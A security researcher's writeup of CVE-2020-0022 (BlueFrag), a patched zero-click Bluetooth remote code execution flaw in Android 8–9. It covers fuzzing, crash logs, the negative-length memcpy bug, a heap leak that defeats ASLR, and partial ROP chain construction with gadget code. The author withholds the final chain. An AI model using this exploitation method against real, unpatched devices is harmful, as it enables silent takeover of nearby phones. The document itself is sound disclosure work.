April 22, 2020 by Jan Ruge

CVE-2020-0022 an Android 8.0-9.0 Bluetooth Zero-Click RCE – BlueFrag

Jan Ruge

Nowadays, Bluetooth is an integral part of mobile devices. Smartphones interconnect with smartwatches and wireless headphones. By default, most devices are configured to accept Bluetooth connections from any
nearby unauthenticated device. Bluetooth packets are processed by the Bluetooth chip (also called a controller), and then passed to the host (Android, Linux, etc.). Both, the firmware on the chip and the host Bluetooth subsystem, are a target for Remote Code Execution (RCE) attacks.

One feature that is available on most classic Bluetooth implementations is answering over Bluetooth pings. Everything an attacker needs to know is the device’s Bluetooth address. Even if the target is not discoverable, it typically accepts connections if it gets addressed. For example, an attacker can run l2ping, which establishes an L2CAP connection and sends echo requests to the remote target.

In the following, we describe a Bluetooth zero-click short-distance RCE exploit against Android 9, which got assigned CVE-2020-0022 . We go through all steps required to establish a remote shell on a Samsung Galaxy S10e, which was working on an up-to-date Android 9 when reporting the issue on November 3 2019. The initial flaw used for this exploit is still present in Android 10, but we utilize an additional bug in Bionic (Android’s libc implementation), which makes exploitation way easier. The bug was finally fixed in the security patch from 1.2.2020 in A-143894715. Here is a demo of the full proof of concept:

Previous Work

During the work on InternalBlue and Frankenstein at SEEMOO, we spent a lot of time investigating the Braodcom Bluetooth firmware. InternalBlue was initially written by Dennis Mantz, and it interacts with the firmware to add debugging capabilities. Within this project, a lot of reverse engineering to understand the details of the firmware itself was done.

For further analysis, we built Frankenstein, which emulates the firmware for fuzzing. To achieve emulation, an essential part is understanding the Bluetooth Core Scheduler (BCS). This component is of interest, as it also processes the packet and payload header, and manages time-critical tasks. These low-level functions are not accessible from the host, and not even within the threaded components of the firmware itself. By accessing the BCS, we were even able to inject raw wireless frames into the emulated firmware.

When fuzzing with Frankenstein, we focused on vulnerabilities that arise prior to pairing. In these parts of the protocol, we found two vulnerabilities, one in classic Bluetooth and one in Bluetooth Low Energy (BLE). The first heap overflow is in the processing of Bluetooth scan results (EIR packets), affecting firmware with build dates in the range 2010-2018, possibly even older (CVE-2019-11516). For this, we provided a full RCE Proof-of-Concept (PoC) to Broadcom in April 2019. After the report, Broadcom claimed that they knew of the issue, and indeed, the newest Samsung Galaxy S10e had a patch that we were not aware of, as it just had been released. The second heap overflow affects all BLE Packet Data Units (PDUs) since Bluetooth 4.2. We provided a PoC to Broadcom in June 2019, which corrupts the heap but misses one primitive
that would be achieved with more data throughput. To the best of our knowledge, this issue has not been fixed as of February 2020.

While working on PoCs and ideas on how to get a lot of data into the heap, we also looked into classic Bluetooth Asynchronous Connection-Less (ACL) packets. These are primarily used for data transfer, such as music streaming, tethering, or, more general, L2CAP. Within the firmware, ACL processing is comparably simple. There are way more sophisticated handlers and proprietary protocol extensions, for example, Jiska Classen found a Link Mangement Protocol (LMP) type confusion (CVE-2018-19860).

Fuzzing ACL

The bug described in this post was triggered within ACL. We fuzzed this protocol by performing bit flips on the packet and payload header. The initial fuzzer was implemented by hooking the function bcs_dmaRxEnable within the firmware, which is invoked by the BCS ACL task. bcs_dmaRxEnable copies wireless frames into the transmit buffer. Prior to this function, the packet and payload headers are already written to the corresponding hardware registers. We are therefore able to modify the full packet before transmission and thus building a simple
Bluetooth fuzzer within the firmware.

In the initial setup, we run l2ping on a Linux host against an Android device over-the-air, and the Bluetooth firmware fuzzer flips bits randomly in the headers. While we were trying to crash the firmware of the Android device, instead, the Android Bluetooth daemon crashed. In the logs, we observe several crash reports like this:

pid: 14808, tid: 14858, name: HwBinder:14808_  >>> com.android.bluetooth <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x79cde00000
    x0  00000079d18360e1  x1  00000079cddfffcb  x2  fffffffffff385ef  x3  00000079d18fda60
    x4  00000079cdd3860a  x5  00000079d18360df  x6  0000000000000000  x7  0000000000000000
    x8  0000000000000000  x9  0000000000000000  x10 0000000000000000  x11 0000000000000000
    x12 0000000000000000  x13 0000000000000000  x14 ffffffffffffffff  x15 2610312e00000000
    x16 00000079bf1a02b8  x17 0000007a5891dcb0  x18 00000079bd818fda  x19 00000079cdd38600
    x20 00000079d1836000  x21 0000000000000097  x22 00000000000000db  x23 00000079bd81a588
    x24 00000079bd819c60  x25 00000079bd81a588  x26 0000000000000028  x27 0000000000000041
    x28 0000000000002019  x29 00000079bd819df0
    sp  00000079bd819c50  lr  00000079beef4124  pc  0000007a5891ddd4

backtrace:
    #00 pc 000000000001ddd4  /system/lib64/libc.so (memcpy+292)
    #01 pc 0000000000233120  /system/lib64/libbluetooth.so (reassemble_and_dispatch(BT_HDR*) [clone .cfi]+1408)
    #02 pc 000000000022fc7c  /system/lib64/libbluetooth.so (BluetoothHciCallbacks::aclDataReceived(android::hardware::hidl_vec<unsigned char> const&)+144)
    [...]

It seems, that memcpy is executed with a negative length inside reassemble_and_dispatch. A simplified implementation of memcpy looks as follows:

void *memcpy(char *dest; char *src, size_t *n) {
  for (size_t i=0; i<n; i++)
    dst[i] = src[i];
}

The length parameter n is of type size_t and, thus, an unsigned integer. If we pass a negative number as n, it will be interpreted as a large positive number because of the twos-complement representation.
As a result, memcpy tries to copy memory in an endless loop, which causes the crash as soon as we hit unmapped memory.

L2CAP Fragmentation

Bluetooth implements fragmentation on various layers. Within the analysis of this crash, we focus on the fragmentation of L2CAP packets passed between the controller and the host. For commands and configuration between host and controller, the Host Controller Interface (HCI) is used.

L2CAP is sent as ACL packets via the same UART wires as HCI. It needs to be fragmented to the maximum ACL packet length. During firmware initialization by the driver on the host, the HCI command Read Buffer Size. On Broadcom chips, this size is 1021. The host’s driver needs to respect these size limits when sending packets to the firmware. Similarly, the firmware also rejects L2CAP inputs that are not properly fragmented over the air. As fragmentation and reassembling happens on the host, but the firmware itself also has strict size limits, L2CAP is interesting for heap exploitation on the host and the controller.

If a L2CAP packet is received, which length is longer than the maximum buffer size of 1021, it has to be reassembled. The partial packet is stored in a map called partial_packets with the connection handle as the key. A buffer that is sufficiently large to hold the final packet is allocated, and the received data is copied to that buffer. The end of the last received fragment is stored in partial_packet->offset.

The following packets have the continuation flag set to indicate that this is a packet fragment. It is the 12th bit in the connection handle inside the ACL header. If such a packet is received, the packet content is then copied to the previous offset.

static void reassemble_and_dispatch(UNUSED_ATTR BT_HDR *packet) {
      [...]
      packet->offset = HCI_ACL_PREAMBLE_SIZE;
      uint16_t projected_offset =
          partial_packet->offset + (packet->len - HCI_ACL_PREAMBLE_SIZE);
      if (projected_offset >
          partial_packet->len) {  // len stores the expected length
        LOG_WARN(LOG_TAG,
             "%s got packet which would exceed expected length of %d."
             "Truncating.",
             __func__, partial_packet->len);
        packet->len = partial_packet->len - partial_packet->offset;
        projected_offset = partial_packet->len;
      }
      memcpy(partial_packet->data + partial_packet->offset,
         packet->data + packet->offset, packet->len - packet->offset);

      [...]
}

This step causes the negative length memcpy, as seen in the code above. In a situation where we get a packet and there are only 2 bytes left to receive, if the continuation is longer than expected, packet->length is truncated to avoid buffer overflows. The length is set to the number of bytes that are left to copy.

As we need to skip the HCI and ACL preamble, we use HCI_ACL_PREAMBLE_SIZE (4) as the packet offset and subtract it from the number of bytes to copy. This results in a negative length of -2 for memcpy.

This has been addressed in master but at this point in time not inandroid10-c2f2-release branch, android10-dev branch, android-10.0.0_r9 tag or the android-9.0.0_r49 tag running on the S10e at that point in time. A fix has been deployed in android-8.0.0_r43, android-8.1.0_r73, android-9.0.0_r53 and android-10.0.0_r29.

Unexpected leak

The above-mentioned bug seems not to be exploitable, as we end up in an endless memcpy. Yet, we occasionally crash in completely different locations. For example, the following crash is located in the same thread, but cannot be explained with a simple infinite copy loop. Thus, we expected to find a different bug somewhere.

pid: 14530, tid: 14579, name: btu message loo  >>> com.android.bluetooth <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7a9e0072656761
    x0  0000007ab07d72c0  x1  0000007ab0795600  x2  0000007ab0795600  x3  0000000000000012
    x4  0000000000000000  x5  0000007a9e816178  x6  fefeff7a3ac305ff  x7  7f7f7f7f7fff7f7f
    x8  007a9e0072656761  x9  0000000000000000  x10 0000000000000020  x11 0000000000002000
    x12 0000007aa00fc350  x13 0000000000002000  x14 000000000000000d  x15 0000000000000000
    x16 0000007b396f6490  x17 0000007b3bc46120  x18 0000007a9e81542a  x19 0000007ab07d72c0
    x20 0000007ab0795600  x21 0000007a9e817588  x22 0000007a9e817588  x23 000000000000350f
    x24 0000000000000000  x25 0000007ab07d7058  x26 000000000000008b  x27 0000000000000000
    x28 0000007a9e817588  x29 0000007a9e816340
    sp  0000007a9e8161e0  lr  0000007a9fde0ca0  pc  0000007a9fe1a9a4

backtrace:
    #00 pc 00000000003229a4  /system/lib64/libbluetooth.so (list_append(list_t*, void*) [clone .cfi]+52)
    #01 pc 00000000002e8c9c  /system/lib64/libbluetooth.so (l2c_link_check_send_pkts(t_l2c_linkcb*, t_l2c_ccb*, BT_HDR*) [clone .cfi]+100)
    #02 pc 00000000002ea25c  /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+1236)
    [...]

We spent a couple of sleepless nights tracking down these crashes and modified the fuzzing setup to be reproducible. However, it was not possible to reproduce these interesting crashes by replaying packets. The main issue during debugging was that we did not compile Android with an address sanitizer. This would have detected any memory corruption as it happens before crashing in a random location. So, in a moment of frustration, we decided to cheat a little bit. By keeping the payload of the L2Ping packets constant, we can compare it with the payload of the response. If the data changes meanwhile, a memory corruption took place but did not produce a crash yet. After running this for a while, we get corrupted responses like this:

With this detection method, we were even able to reproduce this behavior reliably. The following packet combination triggers it:

L2cap packet with 2 bytes remaining for continuation ‘A’s
Continuation longer than the expected 2 bytes containing ‘B’s

In Android logcat, we can observe the following error message:

bt_hci_packet_fragmenter: reassemble_and_dispatch got packet which would
 exceed expected length of 147. Truncating.

This trigger looks similar to the bug described above. Note that only the last bytes are corrupted, whereas the beginning of the packet is still correct. This behavior cannot be explained by the source code and what we know so far. A straight buffer overflow that keeps the first couple of bytes intact or overwrites pointers and offsets in such a controlled manner is rather unlikely. At this point, we decided to set breakpoints in the packet_fragmenter to observe where the packet data is modified. We used the following GDB script to debug that behavior, whereas reassemble_and_dispatch+1408 and reassemble_and_dispatch+1104 are the two memcpy in reassemble_and_dispatch as described earlier.

b reassemble_and_dispatch
commands; x/32x $x0; c; end

b dispatch_reassembled
commands; x/i $lr; x/32x $x0; c; end

b *(reassemble_and_dispatch+1408)
commands; p $x0; p $x1;p $x2; c; end

b *(reassemble_and_dispatch+1104)
commands; p $x0; p $x1; p $x2; c; end

For the first packet containing ‘A’s, we can observe the following log. It is received as expected, and the first memcpy is triggered with a length of 0x52 bytes. This length is also visible in the BT_HDR struct inside the packet and is correct. The length included in the ACL and L2CAP header is two bytes longer than the actual payload to trigger the packet reassembling of the packet. The connection handle in the HCI header is 0x200b and indicates a start packet for the connection handle 0x0b.

The second packet also arrives correctly in reassemble_and_dispatch and the connection handle has changed to 0x100b and indicates a continuation packet. The third argument to memcpy is 0xfffffffffffffffe aka -2 as pointed out above. As memcpy treats the third parameter as an unsigned integer, this memcpy will result in a crash.

But apparently, the application continues and corrupts the last 66 bytes of the partial packet and the corrupted packet is passed to dispatch_reassembled.

memwtf(,,-2);

If we have a closer look at the actual memcpy implementation it is more complex than the simple character-wise memcpy shown above. It is more efficient to copy whole words of memory instead of individual bytes. This implementation takes it one step further and fills registers with 64 bytes of memory content before writing it to the target location. Such an implementation is more complex and has to consider edge cases such as odd lengths and misaligned addresses.

There exists a weird behavior in that memcpy implementation regarding negative lengths. As we try to copy to the end of the destination buffer, we overwrite the last 66 bytes of the L2Ping request with whatever is previous of our second packet. We have written this short PoC to test the memcpy behavior.

int main(int argc, char **argv) {
    if (argc < 3) {
        printf("usage %s offset_dst offset_src\n", argv[0]);
        exit(1);
    }

    char *src = malloc(256);
    char *dst = malloc(256);

    printf("src=%p\n", src);
    printf("dst=%p\n", dst);

    for (int i=0; i<256; i++) src[i] = i;
    memset(dst, 0x23, 256);

    memcpy( dst + 128 + atoi(argv[1]),
            src + 128 + atoi(argv[2]),
            0xfffffffffffffffe );

    //Hexdump
    for(int i=0; i<256; i+=32) {
        printf("%04x:  ", i);
        for (int j=0; j<32; j++) {
            printf("%02x", dst[i+j] & 0xff);
            if (j%4 == 3) printf(" ");
        }
        printf("\n");
    }
}

The behavior was analyzed in Unicorn emulating the aarch64 memcpy implementation. The relevant code is shown in the following:

prfm    PLDL1KEEP, [src]
add srcend, src, count
add dstend, dstin, count
cmp     count, 16
b.ls    L(copy16)           //Not taken as 0xfffffffffffffffe > 16
cmp count, 96
b.hi    L(copy_long)        //Taken as as 0xfffffffffffffffe > 96

[...]

L(copy_long):
and tmp1, dstin, 15         //tmp1 = lower 4 bits of destination
bic dst, dstin, 15
ldp D_l, D_h, [src]
sub src, src, tmp1
add count, count, tmp1      /* Count is now 16 too large.  */
                            //It is not only too large
                            //but might also be positive!
                            //0xfffffffffffffffe + 0xe = 0xc
ldp A_l, A_h, [src, 16]
stp D_l, D_h, [dstin]
ldp B_l, B_h, [src, 32]
ldp C_l, C_h, [src, 48]
ldp D_l, D_h, [src, 64]!
subs    count, count, 128 + 16  /* Test and readjust count.  */
                                //This  will become negative again
b.ls    2f                      //So this branch is taken

[...]


/* Write the last full set of 64 bytes.  The remainder is at most 64
bytes, so it is safe to always copy 64 bytes from the end even if
there is just 1 byte left.  */
//This will finally corrupt -64...64 bytes and terminate
2:
ldp E_l, E_h, [srcend, -64]
stp A_l, A_h, [dst, 16]
ldp A_l, A_h, [srcend, -48]
stp B_l, B_h, [dst, 32]
ldp B_l, B_h, [srcend, -32]
stp C_l, C_h, [dst, 48]
ldp C_l, C_h, [srcend, -16]
stp D_l, D_h, [dst, 64]
stp E_l, E_h, [dstend, -64]
stp A_l, A_h, [dstend, -48]
stp B_l, B_h, [dstend, -32]
stp C_l, C_h, [dstend, -16]
ret

As we are dealing with a very large count value (INT_MAX – 2), it will always be larger than the distance between dst and src. Therefore __memcpy will never be called in our case, which makes this bug unexploitable on Android 10.

Leaking More Data

As described above, we can essentially overwrite the last 64 bytes of the packet with whatever happens to be in front of our source address. The first 20 bytes before the source buffer are always BT_HDR, acl_hdr, and l2cap_hdr. We therefore automatically leak the connection handle of the remote device.

The content of the uninitialized memory depends on the placement of the second packet buffer and therefore its size. By repeatedly sending regular L2Ping echo requests, we can try to place our own
packet data in front of the second packet. This allows us to control the last 44 bytes of the packet with arbitrary data. By shortening the first packet, we can control the full packet struct including the headers. The first packet looks like the following:

After triggering the bug, the corrupted packet looks like the following. The packet containing the ‘X’ is the one we have placed in front of our source buffer. Note, that except for the length in BT_HDR, the packet length is now 0x280 instead of 0x30. The packet->len field must be still the original length, otherwise, the reassemble method would expect further data.

This results in a much more useful leak. Note that this is a data-only attack without code execution or any other additional information required. It can also be used to inject arbitrary L2CAP traffic into any active connection handles. A successful leak might look as follows:

In order to defeat Address Space Layout Randomization (ASLR), we need the base address of some libraries. Occasionally we find an object from libicuuc.so on the heap, which has the following structure:

Some heap pointer
Pointer to uhash_hashUnicodeString_60 at libicuuc.so
Pointer to uhash_compareUnicodeString_60 at libicuuc.so
Pointer to uhash_compareLong_60 at libicuuc.so
Pointer to uprv_deleteUObject_60 at libicuuc.so

We can use the offsets between those functions to reliable detect this structure within the leak. This allows us to compute the base address for libicuuc.so .

PC Control and Payload Location

Several libraries, such as libbluetooth.so, are protected by Clang’s Call Flow Integrity (CFI) implementation. This protects forward edges and should prevent us from simply overwriting function vtables on the heap with arbitrary addresses. Only functions that belong to the affected object should be callable. Even though, upon disconnect, we occasionally trigger the following crash when after corrupting the heap.

signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x37363534333231
    x0  3837363534333231  x1  000000750c2649e0  x2  000000751e50a338  x3  0000000000000000
    x4  0000000000000001  x5  0000000000000001  x6  00000075ab788000  x7  0000000001d8312e
    x8  00000075084106c0  x9  0000000000000001  x10 0000000000000001  x11 0000000000000000
    x12 0000000000000047  x13 0000000000002000  x14 000f5436af89ca08  x15 000024747b62062a
    x16 000000750c2f55d8  x17 000000750c21b088  x18 000000750a660066  x19 000000751e50a338
    x20 000000751e40dfb0  x21 000000751e489694  x22 0000000000000001  x23 0000000000000000
    x24 000000750be85f64  x25 000000750a661588  x26 0000000000000005  x27 00000075084106b4
    x28 000000750a661588  x29 000000750a65fd30
    sp  000000750a65fd10  lr  000000750c264bb8  pc  000000750c264c5c
                                                                                                                                                                                                                        
backtrace:
    #00 pc 00000000000dbc5c  /system/lib64/libchrome.so (base::WaitableEvent::Signal()+200)
    #01 pc 00000000000add88  /system/lib64/libchrome.so (base::internal::IncomingTaskQueue::PostPendingTask(base::PendingTask*)+320)
    [...]
    #09 pc 00000000002dd0a8  /system/lib64/libbluetooth.so (L2CA_DisconnectRsp(unsigned short) [clone .cfi]+84)
    #10 pc 0000000000307a08  /system/lib64/libbluetooth.so (sdp_disconnect_ind(unsigned short, bool) [clone .cfi]+44)
    #11 pc 00000000002e39d4  /system/lib64/libbluetooth.so (l2c_csm_execute(t_l2c_ccb*, unsigned short, void*) [clone .cfi]+5500)
    #12 pc 00000000002eae04  /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+4220)
    [...]

During the leak process, we do not only overflow into the negative direction, but also corrupt data that is stored after the affected buffer. In this particular case, we have overwritten a pointer stored in X0.
By looking at the location in the code, we crash the instructions before a branch register controlled by X0.

dbc5c: f9400008 ldr x8, [x0] // We control X0
dbc60: f9400108 ldr x8, [x8]
dbc64: aa1403e1 mov x1, x20
dbc68: d63f0100 blr x8 // Brach to **X0

If we know an address where we can store arbitrary data, we can control pc! libchrome.so was not compiled with CFI enabled. Our packet data has to be stored on the heap somewhere, but we also need a way to retrieve the address, to gain RCE. This was achieved as the partial packets are stored in a hash map with the connection handle as a key:

BT_HDR* partial_packet =
         (BT_HDR*)buffer_allocator->alloc(full_length + sizeof(BT_HDR));
[...]
memcpy(partial_packet->data, packet->data, packet->len);
[...]
partial_packets[handle] = partial_packet;

This will allocate a map object on the heap, holding the key (handle) and a pointer to our packet. Eventually, we can leak this map object, revealing the pointer to our buffer. As the key is known we can use it to detect this object in the leak. By using the maximum allowed packet size, we have a couple of hundreds of bytes to store our ROP chain and payload.

This overall method is not perfectly reliable but works in 30%-50% of the cases. Even though the Bluetooth daemon is restarted automatically and forked by the same process. Therefore, the address space is only randomized on boot. Even if we crash the daemon, it is restarted with the same address layout, so an attacker can try over and over again to gain RCE.

Calling system();

Even though we know the absolute address of the libicuuc.so, the offsets between the libraries are randomized as well. Therefore we only have gadgets available in that library.
The libicuuc.so calls no interesting functions, such as system calls. At this point Fabian Beterke pointed out, that it would be a good idea to check the library imports for something interesting.

We have no direct use of system or execve, but we have dlsym available. This function requires a handle (e.g. NULL pointer) and a function name as an argument. It resolves and returns the address of that function and can be used to obtain the address to system. Therefore we need to perform a function call and return from it in a controlled way. In ROP, this is usually not a problem, as the gadgets have to end with a return anyway. However, we have no way to perform a stack pivot required for ROP. Thus, we have to use C++ object calls to perform the desired operations, which are often relative to X8 or X19. As a consequence, we have lots of relative references in our payload. To keep track of already used offsets, we implement a function called set_ptr( payload, offset, value), that will throw an error if a given offset in the payload is already used. We also keep track of the register values in order to simplify the process.

To return cleanly from dlsym, we used a deconstructor called u_cleanup_60. It iterates over a list of functions if a pointer is not NULL, the address is called and cleared. This is quite convenient, as we can call dlsym and can control the execution after the return, without a stack pivot.

ldr x8, [x19, #0x40]; cbz x8, #0xbc128; blr x8; str xzr, [x19, #0x40];
ldr x8, [x19, #0x48]; cbz x8, #0xbc138; blr x8; str xzr, [x19, #0x48];
ldr x8, [x19, #0x50]; cbz x8, #0xbc148; blr x8; str xzr, [x19, #0x50];
ldr x8, [x19, #0x58]; cbz x8, #0xbc158; blr x8;

To set x19, lets first recap the preconditions:

x0 points to our buffer
We know the address of our buffer
The first address in our buffer is a pointer, that points to a pointer to our gadget

Furthermore, we have a list of gadgets in a text file so we can grep for them. We can discard all gadgets, that end with a ret instruction, as we can’t use them right now. There are still several gadgets left, that will end with a br register or blr register instruction that can be used. In addition, we need a gadget, that loads data relative to x0, as this is the only register with a known value. So you might run something like this

cat gadgets | grep -v ret | grep "ldr x., \[x0"

You might find a gadget, that looks like this:

ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2

This gadget has two properties, that makes it useful:

It allows specifying the next gadget by using registers, that we have already under control
It performs a useful operation. In this case, set x8 to point within our buffer.

This gives us one more degree of freedom, as we can now also utilize gadgets, that are using x8. So, we will populate our payload buffer with lots of pointers that point into our buffer and are referenced relative to some offset, which gets confusing quickly. Therefore it is helpful to keep track of already used offsets (accomplished by the set_ptr function as described above) as well as register values. New register values have to be chosen in a way that avoids collisions. This way, we can change the offset of register values within the buffer without too much effort.

# Initial condition
# Signal() ldr x8, [x0], ldr x8, [x8], mov x1, x20; blr x8
# x0 points to our buffer
pc_offset = 0x18 # Arbitrary offset
x0 = payload_base
# Initial **x0 = gadget1
set_ptr( payload_ptr, x0 - payload_base, payload_base + pc_offset)

# Set x8 - Set gadget
g = find_gadget(sys.argv[2],
    "ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2")
set_ptr( payload_ptr, pc_offset, g + libicuuc_base)

# Set x8 - Set registers values
x0_new = payload_base + 0x30 # Arbitrary offset
set_ptr( payload_ptr, x0 - payload_base + 0x8, x0_new)
x0 = x0_new
x8 = payload_base + 0x8 # New x8 also arbitrary offset
set_ptr( payload_ptr, x0 - payload_base, x8)
pc_offset = x8 - payload_base + 0x20

Next, we can use a gadget like the following in a similar way to get x19 under control.

ldr x8, [x8, #8] ; mov x19, x0 ; mov x0, x22 ; blr x8

Disclosure and Closing Words

This bug was initially sent to the Android Security Team and on November 3 2019, including a PoC. It was fixed on February 1, 2020, and acknowledged by the Android Security Team. I would like to thank the team to coordinate the process and providing a fix. Also, I would also like to thank Jiska Classen and Fabian Beterke for their assistance. Additionally, we want to give a shout-out to Swing’Blog and Marcin Kozlowski who was the first to our knowledge reversing the key idea of the vulnerability.

Scripts for testing can be downloaded here The ROP chain has been removed from the exploit. The archive contains the following files:

python2 simple_crash.py target PoC for crashing the remote device
python2 simple_leak.py target PoC for the section “Unexpected leak”
python2 fancy_leak.py target PoC for the section “Leaking More Data”
python2 memcpy.py libc.so memcpy Unicorn emulation of memcpy for section “memwtf(,,-2);”
python2 exploit.py target remote_libicuuc.so exploit excluding ROP chain

Also lots of thanks to Polo35, who provided a PoC working on 32bit using a different exploit strategy. For further details check out his repo.